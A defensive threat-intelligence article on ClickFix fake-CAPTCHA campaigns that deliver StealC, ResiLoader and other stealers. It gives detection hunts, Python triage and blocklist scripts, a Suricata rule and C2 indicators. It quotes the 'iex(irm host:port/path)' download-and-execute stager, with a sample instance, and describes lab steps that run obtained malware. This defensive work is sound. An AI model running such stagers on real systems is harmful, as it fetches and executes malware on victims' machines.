
Introduction
Threat actors have turned the internet’s most trusted security cues — Google reCAPTCHA and Cloudflare verification badges — into weapons. Since late 2025, sophisticated ClickFix social engineering campaigns have been impersonating these brands with near-perfect fidelity, tricking users into manually executing malicious PowerShell commands that bypass traditional security controls entirely. What makes this attack chain uniquely dangerous is that it doesn’t exploit a software vulnerability; it exploits human trust and the reflexive obedience users have developed toward “verify you’re human” prompts, turning the victim into an unwitting accomplice in their own compromise.
Learning Objectives
- Understand the complete ClickFix attack chain — from fake verification pages to final payload execution — and identify the specific malware families deployed (StealC, HijackLoader, NetSupport RAT, ResiLoader, Amatera, and Remus).
- Learn how to detect, analyze, and block these threats using Sysmon, PowerShell logging, Windows event auditing, and network traffic analysis.
- Master defensive strategies including EDR/AV hardening, Windows attack surface reduction rules, and user awareness training to break the social engineering loop.
You Should Know
1. Anatomy of the ClickFix Attack Chain — How a Fake CAPTCHA Leads to Full System Compromise
The attack begins when a user lands on a compromised or maliciously registered domain hosting a page that mimics Google reCAPTCHA, Google Meet prompts, or Cloudflare security checks. These pages are hosted across repurposed domains, compromised legitimate websites, and Cloudflare Pages (.pages.dev) infrastructure. The page displays an instruction — often phrased as “Click here to verify you’re human” or “Press Windows + R, then paste the following command” — and provides a pre-copied PowerShell command.
The command typically follows this pattern:
powershell -c "iex(irm '{IP}:{Port}/{Path}')"
Observed ports in these campaigns include 6600, 9900, 5506, 7895, 7493, 149, and 8442. Some variants use the IClickFix framework to dynamically inject payloads via clipboard injection. Once executed, the PowerShell downloader drops a script named `tmpXXXX.tmp.ps1` in the Temp directory. This script creates C:\ProgramData\Zooms, downloads second-stage payloads from Cloudflare R2 buckets or attacker-controlled IPs, and exfiltrates host data to endpoints such as `http://{IP}/dl-callback`.
Step‑by‑step guide to analyzing this attack chain in a lab environment:
1. Set up a Windows 10/11 analysis VM with Sysmon, Process Monitor, and Wireshark installed. Ensure the VM is isolated from your production network.
2. Obtain a malicious PowerShell command from a threat intelligence feed or sandbox report. Defang the IP/domain before any testing.
3. Execute the command in a monitored environment while capturing network traffic with Wireshark and process creation events with Sysmon.
4. Monitor for the following indicators:
   - PowerShell spawning `tmpXXXX.tmp.ps1` from `%TEMP%`
   - Creation of the `C:\ProgramData\Zooms` directory
   - Outbound HTTP/HTTPS requests to ports 6600, 9900, 5506, etc.
   - Download of ZIP or MSI files from Cloudflare R2 buckets (pattern: `pub-.r2.dev`)
5. Extract the second-stage payload and submit it to VirusTotal or a sandbox for analysis.
6. Document the full attack chain, including process trees, network connections, and file system changes.
Windows detection command — to hunt for suspicious PowerShell execution patterns, run this in an elevated PowerShell session (the parenthesis in `iex(irm` and the dots in the dropper name must be escaped, since `-match` takes a regular expression):
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object { $_.Message -match 'iex\(irm' -or $_.Message -match 'tmp.*\.tmp\.ps1' } | Select-Object TimeCreated, Message
Linux detection — for environments where PowerShell is used cross-platform, monitor with:
sudo grep -r "iex(irm" /var/log/ 2>/dev/null
sudo journalctl | grep -i "powershell" | grep -E 'iex|irm|tmp.*\.ps1'
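The two `Get-WinEvent` and `grep` hunts above only surface raw lines; an analyst still has to pull the stager's host, port and path out of each hit and decide whether it fits the pattern described in this section. The following Python is an added example (not code from the article or from any of the tools it names) that does that triage over exported script-block log lines: it recognises the `iex(irm 'host:port/path')` stager shape, the `tmpXXXX.tmp.ps1` dropper in `%TEMP%` and the `ProgramData\Zooms` staging directory, and checks the extracted port against the ports reported above. The sample log lines, the RFC 5737 addresses in them and the tolerance for long-form `Invoke-Expression`/`Invoke-RestMethod` spellings are my own constructions and assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Ports the article reports for the iex(irm ...) stagers in these campaigns.
OBSERVED_PORTS = {6600, 9900, 5506, 7895, 7493, 149, 8442}

# Matches the download-and-execute shape quoted in the article: iex(irm 'host:port/path').
# Assumption: long forms (Invoke-Expression / Invoke-RestMethod), an http(s):// prefix
# and a missing port are tolerated so a trivially reworded lure still triggers.
DOWNLOADER_RE = re.compile(
    r"\b(?:iex|invoke-expression)\s*\(\s*(?:irm|invoke-restmethod)\s+['\"]?"
    r"(?:https?://)?(?P<host>[a-z0-9.\-]+)(?::(?P<port>\d{1,5}))?(?P<path>/[^'\")\s]*)?",
    re.IGNORECASE,
)
# Dropper name reported above: tmpXXXX.tmp.ps1 written to %TEMP%.
TMP_SCRIPT_RE = re.compile(r"\\Temp\\tmp[0-9a-z]{4}\.tmp\.ps1\b", re.IGNORECASE)
# Staging directory the dropper creates.
ZOOMS_RE = re.compile(r"\\ProgramData\\Zooms\b", re.IGNORECASE)


@dataclass
class Verdict:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)
    host: Optional[str] = None
    port: Optional[int] = None
    path: Optional[str] = None


def triage_command(cmd: str) -> Verdict:
    """Score one command line / script block and extract the stager's host, port and path."""
    reasons: List[str] = []
    host = port = path = None
    m = DOWNLOADER_RE.search(cmd)
    if m:
        host = m.group("host")
        port = int(m.group("port")) if m.group("port") else None
        path = m.group("path")
        reasons.append("iex(irm ...) download-and-execute stager")
        if port in OBSERVED_PORTS:
            reasons.append(f"port {port} matches ports seen in the ClickFix campaigns")
    if TMP_SCRIPT_RE.search(cmd):
        reasons.append("tmpXXXX.tmp.ps1 dropper referenced in %TEMP%")
    if ZOOMS_RE.search(cmd):
        reasons.append("ProgramData\\Zooms staging directory referenced")
    return Verdict(bool(reasons), reasons, host, port, path)


def triage_log(lines: List[str]) -> List[Verdict]:
    """Run triage_command over exported script-block log lines and keep only the hits."""
    return [v for v in (triage_command(line) for line in lines) if v.suspicious]


# Constructed sample log lines (RFC 5737 documentation addresses), not real telemetry.
SAMPLE_LINES = [
    "powershell -c \"iex(irm '203.0.113.10:6600/verify')\"",
    "powershell -ep bypass -File C:\\Users\\bob\\AppData\\Local\\Temp\\tmpA1B2.tmp.ps1",
    "Get-ChildItem C:\\Windows\\System32 | Measure-Object",
    "New-Item -ItemType Directory -Path C:\\ProgramData\\Zooms",
]

if __name__ == "__main__":
    for verdict in triage_log(SAMPLE_LINES):
        print(verdict)
```

Feed it the `Message` field of the 4104 script-block events from the `Get-WinEvent` query above, one per line; the extracted host and port can then go straight into the perimeter blocklist described in the next section.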
2. The Malware Arsenal — StealC, HijackLoader, NetSupport RAT, and the New ResiLoader
The payload delivery in this campaign is highly modular, distributing malware via MSI installers, ZIP archives, and executable loaders. Each payload serves a distinct purpose in the attacker’s kill chain:
| Payload | Delivery Method | Primary Function |
|---|---|---|
| StealC | Process hollowing into ServiceModelReg.exe | Info-stealer targeting credentials, cookies, and crypto wallets |
| ResiLoader | Trojanized Electron-based Franz app (libEGL.zip) | .NET NativeAOT DLL that disables AV/EDR via BYOD driver |
| NetSupport RAT | Setup.msi / Invintrum_first.msi | Full remote access and surveillance |
| Amatera Stealer | arworks.zip | Credential and data stealer |
| Remus Stealer | water-1ight.zip | Information stealer |
| Rust Stealer | ibrowser.exe | Lightweight stealer with C2 at popularcard[.]shop |
The most concerning development is ResiLoader, an obfuscated .NET NativeAOT DLL (msys-crypto-3.dll) that uses Bring-Your-Own-Driver (BYOD) techniques with the `pcdhost.sys` driver to disable over 140 AV/EDR processes. It establishes persistence through the RUN registry key and C:\ProgramData\Google Update, performs UAC bypass using the ICMLuaUtil COM interface, and ultimately injects StealC into ServiceModelReg.exe via process hollowing.
Step‑by‑step guide to detecting and blocking these payloads:
1. Enable PowerShell script block logging via Group Policy: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell → Turn on PowerShell Script Block Logging.
2. Monitor for MSI execution from non-standard locations using Sysmon event ID 7 (Image loaded) and 1 (Process creation):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object { $_.Message -match 'msiexec' -and $_.Message -match 'Temp|ProgramData' }
3. Block known malicious hashes at the endpoint:
   - ResiLoader: `72907d0ca3258365838626f6a8d993a6`
   - StealC: `0234E3188F2883A438B3F2BEAB7A78B2`
   - NetSupport RAT: `eee416efcb1e33f220cdb4b05496a07a`
   - Remus Stealer: `6a9ac6b3fff7b695dbd4df6ff7f6c516`
   - Amatera Stealer: `206ce339febca0c3bcc850f42595fc63`
   - Rust Stealer: `b8d53740024d126cb55f83854335a4ab`
4. Deploy Windows Defender Attack Surface Reduction (ASR) rules to block Office apps from creating child processes and block executable content from email and web. Use Add-MpPreference for each rule: Set-MpPreference replaces the whole ASR rule list, so a second Set-MpPreference call would silently undo the first.
Add-MpPreference -AttackSurfaceReductionRules_Ids D4F940AB-401B-4EFC-AADC-AD5F3C50688A -AttackSurfaceReductionRules_Actions Enabled
Add-MpPreference -AttackSurfaceReductionRules_Ids 3B576869-A4EC-45E9-8137-84A3D1F3B45A -AttackSurfaceReductionRules_Actions Enabled
5. Block the known C2 domains and IPs at the network perimeter (defanged — re-fang only in controlled environments):
   - Domains: completstep[.]com, onegeekworld[.]com, antibotv3[.]com, generator-qrcode[.]online, popularcard[.]shop, `xzz[.]proxygrid[.]cc`
   - IPs: 151.240.151[.]126, 85.239.149[.]16, 93.152.224[.]29, 135.181.171[.]40, `146.19.248[.]120`
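The hashes and defanged indicators above are published for humans to read, not for a blocklist to consume: the hashes mix upper and lower case, and the `[.]` defanging has to be undone before a firewall or DNS sinkhole will accept the values. The Python below is an added example (not code from the article) that normalises exactly this set: it re-fangs and re-defangs indicators, classifies each one as IPv4, domain or MD5 after validating its shape, groups them into per-type blocklists, and matches a file's MD5 against the hash list case-insensitively. The indicator values are the ones printed above; the defanging conventions handled (`[.]`, `[:]`, `hxxp`) are the common ones and are my assumption about the feeds you ingest.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional, Set

# Indicators exactly as published (defanged) in the section above.
DEFANGED_DOMAINS = [
    "completstep[.]com", "onegeekworld[.]com", "antibotv3[.]com",
    "generator-qrcode[.]online", "popularcard[.]shop", "xzz[.]proxygrid[.]cc",
]
DEFANGED_IPS = [
    "151.240.151[.]126", "85.239.149[.]16", "93.152.224[.]29",
    "135.181.171[.]40", "146.19.248[.]120",
]
# MD5 hashes published above, keyed lower-case so mixed-case feeds still match.
KNOWN_MD5: Dict[str, str] = {h.lower(): family for h, family in [
    ("72907d0ca3258365838626f6a8d993a6", "ResiLoader"),
    ("0234E3188F2883A438B3F2BEAB7A78B2", "StealC"),
    ("eee416efcb1e33f220cdb4b05496a07a", "NetSupport RAT"),
    ("6a9ac6b3fff7b695dbd4df6ff7f6c516", "Remus Stealer"),
    ("206ce339febca0c3bcc850f42595fc63", "Amatera Stealer"),
    ("b8d53740024d126cb55f83854335a4ab", "Rust Stealer"),
]}

# Shape validators: a malformed indicator must never reach a blocklist unnoticed.
IPV4_RE = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
DOMAIN_RE = re.compile(r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def refang(indicator: str) -> str:
    """Undo the usual defanging conventions so the value can be loaded into a control."""
    return indicator.strip().replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def defang(indicator: str) -> str:
    """Re-apply defanging before the value is pasted into a ticket or report."""
    return indicator.replace(".", "[.]").replace("http", "hxxp")


def classify(indicator: str) -> str:
    """Return 'ipv4', 'md5', 'domain' or 'unknown' for a (possibly defanged) indicator."""
    value = refang(indicator).lower()
    if IPV4_RE.match(value):
        return "ipv4"
    if MD5_RE.match(value):
        return "md5"
    if DOMAIN_RE.match(value):
        return "domain"
    return "unknown"


def build_blocklist(indicators: Iterable[str]) -> Dict[str, Set[str]]:
    """Group re-fanged, lower-cased indicators by type; 'unknown' collects anything malformed."""
    groups: Dict[str, Set[str]] = {"ipv4": set(), "domain": set(), "md5": set(), "unknown": set()}
    for raw in indicators:
        groups[classify(raw)].add(refang(raw).lower())
    return groups


def md5_of(data: bytes) -> str:
    """Hex MD5 of a file's bytes, matching the format the article publishes."""
    return hashlib.md5(data).hexdigest()


def lookup_hash(md5_hex: str) -> Optional[str]:
    """Family name for a known hash, or None; case-insensitive."""
    return KNOWN_MD5.get(md5_hex.strip().lower())


if __name__ == "__main__":
    for kind, values in build_blocklist(DEFANGED_DOMAINS + DEFANGED_IPS).items():
        print(kind, sorted(values))
    print(lookup_hash("0234e3188f2883a438b3f2beab7a78b2"))
```

Anything that lands in the `unknown` bucket (a typo in a feed, a truncated hash) should be reviewed rather than dropped silently, which is why the function returns it instead of raising.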
3. Cloudflare Infrastructure Abuse — R2 Buckets, Pages.dev, and the “Hehe” Response
Attackers have weaponized Cloudflare’s own infrastructure against its users. The campaigns use Cloudflare Pages (.pages.dev) to host obfuscated SECURITY GATEWAY lures and Cloudflare R2 buckets (pub-.r2.dev) for payload hosting. Observed `.pages.dev` subdomains include p-floribunds, pg-altirade2, pg-cordivant-m6, and g-luminence. The infrastructure also features characteristic “hehe” HTTP responses, which can serve as a network detection signature.
Step‑by‑step guide to detecting and mitigating Cloudflare infrastructure abuse:
1. Implement network detection rules for `.pages.dev` and `pub-.r2.dev` domains in your proxy or firewall, treating them as high-risk unless explicitly whitelisted for business use.
2. Monitor HTTP traffic for the “hehe” response header or body content using a network detection and response (NDR) tool or Suricata (the `flow` keyword restricts the match to server responses on established sessions):
alert http any any -> any any (msg:"ClickFix hehe response detected"; flow:established,to_client; content:"hehe"; http_server_body; sid:1000001; rev:1;)
3. Deploy DNS sinkholing for known malicious domains and subdomains. Add the following to your DNS blocklist:
   - `onegeekworld.com`
   - `antibotv3.com`
   - `centralwildcats.com`
   - `regdev-google.com`
   - `generator-qrcode.online`
   - `completstep.com`
4. Use Cloudflare’s own threat intelligence — if you are a Cloudflare customer, enable Bot Management and Challenge Passage to block automated and suspicious traffic.
5. Conduct regular audits of outbound traffic to Cloudflare R2 buckets. Legitimate business use of R2 should be limited and documented; any unexpected `pub-.r2.dev` connections should trigger an alert.
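Steps 1 and 5 above both come down to the same control: every `.pages.dev` or `pub-<id>.r2.dev` host in the proxy log is an alert unless it is on a documented allowlist. The Python below is an added example (not code from the article or from Cloudflare) that applies that rule to proxy log lines and, alongside it, implements the “hehe” response check from step 2 as a body test. The log format (`timestamp client method host path status bytes`), the allowlist entry and the `pub-EXAMPLE.r2.dev` bucket name are constructed; the page gives only the abbreviated `pub-.r2.dev` pattern, and `pg-altirade2` is one of the subdomains it reports. Treating the whole body, rather than any substring, as the “hehe” marker is my assumption, chosen to be tighter than the Suricata `content` match above.

```python
import re
from typing import List, NamedTuple, Set


class ProxyHit(NamedTuple):
    timestamp: str
    client: str
    host: str
    path: str
    reason: str


# Hosts explicitly approved for business use (constructed allowlist, step 1/5 above).
ALLOWLIST: Set[str] = {"intranet-wiki.pages.dev"}

PAGES_DEV_RE = re.compile(r"(?:^|\.)pages\.dev$")
# Public R2 bucket endpoints have the pub-<id>.r2.dev shape the article abbreviates as pub-.r2.dev.
PUBLIC_R2_RE = re.compile(r"^pub-[a-z0-9]+\.r2\.dev$")


def classify_host(host: str) -> str:
    """Return the reason a host should alert, or '' when it is allowed or unrelated."""
    h = host.lower().rstrip(".")
    if h in ALLOWLIST:
        return ""
    if PAGES_DEV_RE.search(h):
        return "Cloudflare Pages (.pages.dev) host not on allowlist"
    if PUBLIC_R2_RE.match(h):
        return "public Cloudflare R2 bucket (pub-<id>.r2.dev) not on allowlist"
    return ""


def scan_proxy_log(text: str) -> List[ProxyHit]:
    """Walk proxy log lines and return one ProxyHit per host that needs review."""
    hits: List[ProxyHit] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # malformed line: skip it rather than abort the whole scan
        ts, client, _method, host, path = parts[:5]
        reason = classify_host(host)
        if reason:
            hits.append(ProxyHit(ts, client, host.lower(), path, reason))
    return hits


def is_hehe_response(body: bytes) -> bool:
    """Assumption: the marker is the entire response body (whitespace aside), not a substring."""
    return body.strip().lower() == b"hehe"


# Constructed proxy log (RFC 1918 clients, placeholder bucket id), not real traffic.
SAMPLE_PROXY_LOG = """\
2025-11-04T09:12:01Z 10.20.0.14 GET pg-altirade2.pages.dev /index.html 200 18422
2025-11-04T09:12:03Z 10.20.0.14 GET pub-EXAMPLE.r2.dev /libEGL.zip 200 5242880
2025-11-04T09:13:10Z 10.20.0.31 GET docs.example.com /guide 200 9010
2025-11-04T09:14:45Z 10.20.0.31 GET intranet-wiki.pages.dev /home 200 1200
2025-11-04T09:15:00Z 10.20.0.52 GET example.r2.dev /report.pdf 200 40000
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

The allowlist is keyed on the exact host so that a lookalike such as a new `pages.dev` project name never inherits approval; adding a wildcard would defeat the point of step 5.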
4. User-Assisted Execution — Why Social Engineering Beats Exploits Every Time
This campaign underscores a fundamental shift in the threat landscape: user-assisted execution has become more reliable than exploit-based delivery. By leveraging trusted brands and requiring manual interaction, attackers significantly reduce detection rates while maintaining flexible, multi-payload distribution capabilities. The “approval gate” mechanism in some variants allows real-time selection of payloads, meaning the attacker can choose what to deploy based on the victim’s environment.
Additional lures include fake Google login alerts, QR code generators, and Google Meet “fix audio driver” prompts, with endpoints like `/api/driver-clipboard.php` returning OS-specific payloads.
Step‑by‑step guide to building user resilience:
1. Train users to recognize verification page red flags: legitimate reCAPTCHA and Cloudflare challenges never ask users to open the Run dialog (Windows+R) or Terminal and paste commands.
2. Implement a “copy-paste prohibition” policy for sensitive environments: use endpoint DLP to block clipboard content that contains PowerShell, `iex`, `irm`, or base64-encoded strings from being pasted into Run or Terminal.
3. Deploy browser extensions that block known phishing domains and display warnings for `.pages.dev` and other free-hosting TLDs.
4. Conduct simulated phishing exercises that specifically mimic ClickFix verification pages to test user awareness in a safe environment.
5. Establish an easy reporting mechanism — users who encounter suspicious verification pages should have a one-click way to report them to the security team.
5. Advanced Persistence and Evasion — UAC Bypass, BYOD Drivers, and Process Hollowing
The technical sophistication of this campaign is notable. ResiLoader employs multiple advanced evasion techniques:
- BYOD (Bring Your Own Driver): Uses the legitimate `pcdhost.sys` driver to terminate AV/EDR processes, bypassing kernel-mode protections.
- UAC Bypass: Leverages the `ICMLuaUtil` COM interface to elevate privileges without triggering UAC prompts.
- Process Hollowing: Injects StealC into `ServiceModelReg.exe`, a legitimate Windows process, to evade process-based detection.
- Persistence: Creates a RUN registry key and a folder at `C:\ProgramData\Google Update` to ensure the malware survives reboots.
Step‑by‑step guide to detecting advanced evasion techniques:
1. Monitor for unusual driver loads using Sysmon event ID 6 (Driver loaded). Look for `pcdhost.sys` or other unsigned drivers loading from non-standard locations.
2. Enable UAC audit logging to detect COM interface abuse:
auditpol /set /subcategory:"User Account Control" /success:enable /failure:enable
3. Detect process hollowing by monitoring for `ServiceModelReg.exe` spawning with abnormal command lines or from non-standard paths. Use this Sigma rule (translated to PowerShell for hunting; backslashes and dots are escaped because `-match`/`-notmatch` take regular expressions):
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object { $_.Message -match 'ServiceModelReg\.exe' -and $_.Message -notmatch 'C:\\Windows\\Microsoft\.NET' }
4. Monitor registry persistence with Sysmon event ID 13 (Registry value set), looking for writes under the `CurrentVersion\Run` key or values pointing at the `Google Update` folder:
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=13} | Where-Object { $_.Message -match 'CurrentVersion\\Run' -or $_.Message -match 'Google Update' }
5. Deploy EDR with behavioral detection — modern EDR solutions should flag process hollowing, UAC bypass, and BYOD driver abuse. Ensure your EDR is configured with these detection rules enabled.
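The hunts in steps 1, 3 and 4 each query one Sysmon event ID in isolation. When the same telemetry is exported (for example as JSON from a SIEM), the three checks can be expressed as one rule set over the event fields rather than as regexes over the rendered `Message` text. The Python below is an added example (not the article's code and not a Sysmon or Sigma artefact) that evaluates constructed Sysmon-style events: `ServiceModelReg.exe` running from outside `C:\Windows\Microsoft.NET`, `pcdhost.sys` or any driver loaded from outside the drivers directory or reported unsigned, and `Run` key writes, with an extra flag when the value points into `ProgramData\Google Update`. For the `ICMLuaUtil` technique named above it also flags `dllhost.exe` hosting the CMSTPLUA COM server, whose CLSID `{3E5FC7F9-9A51-4367-9063-A120244FBEC7}` is not given on this page and is included here from general knowledge. The events, paths and field subset are constructed; Sysmon emits many more fields than are modelled.

```python
import ntpath
from typing import Dict, List, Tuple

# Constructed Sysmon-style events (field subset only), not real telemetry.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ServiceModelReg.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe", "CommandLine": "ServiceModelReg.exe -ua"},
    {"EventID": 1, "Image": r"C:\ProgramData\Google Update\ServiceModelReg.exe",
     "ParentImage": r"C:\ProgramData\Google Update\franz.exe", "CommandLine": "ServiceModelReg.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\dllhost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\dllhost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"},
    {"EventID": 6, "ImageLoaded": r"C:\ProgramData\Google Update\pcdhost.sys", "Signed": "true"},
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys", "Signed": "true"},
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate",
     "Details": r"C:\ProgramData\Google Update\updater.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
]

# Where the legitimate copies live; anything else is the hollowing / BYOD location to review.
LEGIT_SERVICEMODELREG_DIR = "c:\\windows\\microsoft.net\\"
DRIVER_DIR = "c:\\windows\\system32\\drivers\\"
# CLSID of the CMSTPLUA COM server that exposes ICMLuaUtil (from general knowledge, not this page).
CMSTPLUA_CLSID = "{3E5FC7F9-9A51-4367-9063-A120244FBEC7}".lower()


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def _under(path: str, prefix: str) -> bool:
    return path.lower().startswith(prefix)


def evaluate(ev: Dict[str, object]) -> List[str]:
    """Return every rule the event trips; an empty list means nothing to review."""
    hits: List[str] = []
    eid = ev.get("EventID")
    if eid == 1:  # Process creation
        image = str(ev.get("Image", ""))
        if _base(image) == "servicemodelreg.exe" and not _under(image, LEGIT_SERVICEMODELREG_DIR):
            hits.append("ServiceModelReg.exe outside Microsoft.NET (possible hollowing host)")
        if _base(image) == "dllhost.exe" and CMSTPLUA_CLSID in str(ev.get("CommandLine", "")).lower():
            hits.append("dllhost.exe hosting CMSTPLUA COM server (ICMLuaUtil UAC bypass pattern)")
    elif eid == 6:  # Driver loaded
        driver = str(ev.get("ImageLoaded", ""))
        if _base(driver) == "pcdhost.sys":
            hits.append("pcdhost.sys loaded (BYOD driver named in the campaign)")
        if not _under(driver, DRIVER_DIR):
            hits.append("driver loaded from outside System32\\drivers")
        if str(ev.get("Signed", "")).lower() != "true":
            hits.append("driver not signed")
    elif eid == 13:  # Registry value set
        target = str(ev.get("TargetObject", "")).lower()
        if "\\currentversion\\run\\" in target:
            hits.append("Run key persistence written (review)")
            if "programdata\\google update" in str(ev.get("Details", "")).lower():
                hits.append("Run value points into ProgramData\\Google Update")
    return hits


def triage(events: List[Dict[str, object]]) -> List[Tuple[int, List[str]]]:
    """Index/hit pairs for every event that trips at least one rule."""
    return [(i, hits) for i, ev in enumerate(events) if (hits := evaluate(ev))]


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(index, hits)
```

The lone "Run key persistence written (review)" hit is deliberately low-severity: legitimate software writes that key too, and the second, higher-confidence flag fires only when the value also points into the staging folder this campaign uses.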
What Undercode Say
- Trust is the new attack vector: This campaign proves that attackers no longer need zero-day exploits. By weaponizing user trust in Google and Cloudflare brands, they achieve the same outcome — full system compromise — with far less effort and far higher success rates.
- Defense requires a human + technical approach: No amount of technical controls can fully protect against an attack that requires the user to manually execute a command. Organizations must pair technical controls (ASR rules, application whitelisting, PowerShell logging) with continuous security awareness training that specifically addresses this new ClickFix threat vector.
- Cloud infrastructure is a double-edged sword: While Cloudflare provides excellent security services, its free-tier offerings (Pages, R2) are being actively abused by threat actors. Security teams must treat `.pages.dev` and `pub-.r2.dev` domains with suspicion and implement granular controls around them.
- The malware ecosystem is highly modular: The use of multiple loaders and stealers in a single campaign indicates a mature, professional operation. Defenders must track not just the final payload but the entire delivery chain, including loaders like ResiLoader that are designed specifically to disable defenses.
- Detection requires deep visibility: Standard antivirus and even next-gen AV are often bypassed by these techniques. Organizations need Sysmon, PowerShell logging, and network traffic analysis to gain the visibility required to detect these attacks in progress.
Prediction
- -1 The ClickFix model will be rapidly adopted by other threat actors and ransomware gangs. Expect to see similar campaigns impersonating Microsoft, Apple, and other major tech brands within the next 3–6 months, with even more convincing lures and expanded payload families.
- -1 ResiLoader and similar BYOD-based loaders will become a standard component in malware toolkits. The technique of using legitimate signed drivers to disable AV/EDR is highly effective and difficult to block without breaking legitimate functionality.
- +1 Increased awareness of ClickFix campaigns will lead to better user training and the development of new browser-based protections. We may see browsers implementing warnings when users attempt to paste PowerShell commands into the Run dialog or terminal from web pages.
- -1 Cloudflare and other CDN providers will face increasing pressure to curb abuse of their free-tier services. However, the scale of their infrastructure makes it difficult to completely prevent malicious use without impacting legitimate users.
- +1 The security community will respond with new detection rules and threat hunting playbooks specifically tailored to ClickFix attacks. Open-source Sigma rules and YARA rules for ResiLoader, StealC, and the associated infrastructure will become widely available, enabling faster detection and response.
- -1 Small and medium-sized businesses without dedicated security teams will remain the most vulnerable. These organizations rarely have the visibility or expertise to detect user-assisted execution attacks, making them prime targets for future ClickFix campaigns.
Reported By: Divya Kumari – Hackers Feeds